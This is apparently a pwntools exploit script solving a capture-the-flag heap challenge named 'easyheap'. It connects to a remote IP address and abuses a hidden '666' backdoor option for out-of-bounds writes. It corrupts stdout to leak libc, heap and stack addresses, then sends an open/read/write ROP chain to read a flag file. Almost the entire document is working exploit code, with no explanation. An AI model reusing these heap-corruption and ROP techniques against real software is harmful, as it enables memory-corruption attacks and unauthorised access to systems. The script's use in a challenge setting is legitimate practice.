1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170
| from pwn import * import ctypes import time
context(arch="amd64") context.log_level = 'debug' getIO = lambda:process(['./ld-2.31.so', './easyheap'], env={'LD_PRELOAD': './libc-2.31.so'})
io = remote('112.74.185.213',46699)
def add(size, cont): io.sendlineafter('4.delete\n', '1') io.sendlineafter('Size?\n', str(size)) io.sendafter('Context:\n', cont)
def add2(size, offset, cont): pp = '1\x00' pp += '\x00' * (12 - len(pp)) pp += p32(ctypes.c_uint32(offset).value) io.sendafter('4.delete\n', pp) io.sendlineafter('Size?\n', str(size)) io.sendlineafter('Context:\n', cont)
def add3(size, offset, cont): pp = '1\x00' pp += '\x00' * (12 - len(pp)) pp += p32(ctypes.c_uint32(offset).value) io.sendafter('4.delete', pp) io.sendlineafter('Size?', str(size)) io.sendafter('Context:', cont)
def edit(idx, cont): io.sendlineafter('4.delete\n', '2') io.sendlineafter('Idx?\n', str(idx)) io.sendlineafter('Context:\n', cont)
def edit2(idx, cont): io.sendlineafter('4.delete', '2') io.sendlineafter('Idx?', str(idx)) io.sendafter('Context:', cont)
def backdoor(size, offset, cont): io.sendlineafter('4.delete\n', '666') io.sendlineafter('Size?\n', str(size)) io.sendlineafter('Offset?\n', str(offset)) io.sendafter('Context:\n', cont)
def backdoor2(size, offset, cont): io.sendlineafter('4.delete', '666') io.sendlineafter('Size?', str(size)) io.sendlineafter('Offset?', str(offset)) io.sendafter('Context:', cont)
while 1: fake_size = 0x061 + 0x1000*1 backdoor(0x18, 0x6b8, p64(fake_size)) add(0x2000, 'ccccc') add(0x20, 'c') add(0x20, 'ccc') add(0x20, 'ccc') add(0x20, 'ccc') add(0x20, 'ccc') add(0x20, 'ccc')
add2(0x10, -10, 'ccc')
backdoor(0x18, -3080, '\xb0') backdoor(0x18, -3616+6, p32(0x7)) stdout_in = 0x16a0
backdoor(0x18, 800, '\xa0\x16')
flag = 0xfbad1800 add2(0x48, 1, 'aa') try: add2(0x48, 0, p64(flag)+p64(0)*3 + '\x08') inp = io.recv(8,timeout=0.2) if '1.add' in inp: assert 1 == 2 stdin_addr = u64(inp) log.success('stdin_addr:'+hex(stdin_addr)) break except: io.close() io = remote('112.74.185.213',46699)
libc_base = stdin_addr - 0x1ee7f0 log.success('libc_base:'+hex(libc_base))
main_arena_96 = 0x1ecbe0 + libc_base edit2(0, p64(flag)+p64(0)*3 + p64(main_arena_96))
heap_base = u64(io.recv(8)) -0x23010 log.success('heap_base:'+hex(heap_base))
environ = 0x1ef600 + libc_base edit2(0, p64(flag)+p64(0)*3 + p64(environ) + p64(environ+0x10) + p64(environ+0x10)) log.success('environ:'+hex(environ))
stack_environ = u64(io.recv(8)) log.success('stack_environ:'+hex(stack_environ))
rax_0 = 0x00000000000b1d89 + libc_base rax_1 = 0x00000000000cfb50 + libc_base rax_2 = 0x00000000000cfb60 + libc_base pop_rdi = 0x0000000000023b72 + libc_base pop_rsi = 0x000000000002604f + libc_base xchg_eax_edi = 0x00000000000f1b95 + libc_base syscall = 0x00000630D9 + libc_base add_rax = 0x00000000000ac79c + libc_base push_rdi = 0x00000000000e312b + libc_base pop_rdi = 0x0000000000023b72+libc_base vuln_stack_tar = stack_environ - 0x138 + 0x18 backdoor2(0x18, -512, p64(vuln_stack_tar))
add3(0xf0-8, 1, 'cccccc')
rop_tmp = [ pop_rdi, 0xadd, pop_rsi, 0, rax_2, syscall, xchg_eax_edi, pop_rsi, 0xadd, rax_0, syscall, pop_rdi, 1, rax_1, syscall ] ''' rop_tmp = [ pop_rdi, 0xadd, pop_rsi, 0, rax_2, syscall, # open xchg_eax_edi, # eax -> edi fd rax_0, pop_rsi, 78, add_rax, pop_rsi, 0xadd, syscall, # getdents pop_rdi, 1, rax_1, syscall # write ] ''' rop_tmp[1] = rop_tmp[8] = vuln_stack_tar + len(rop_tmp) * 8 rop_tmp = flat(rop_tmp) + '/Flag/R3a1_f1Ag_1s_here\x00' ''' gdb.attach(io) pause() ''' add3(0xf0-8, 1, rop_tmp)
io.interactive()
|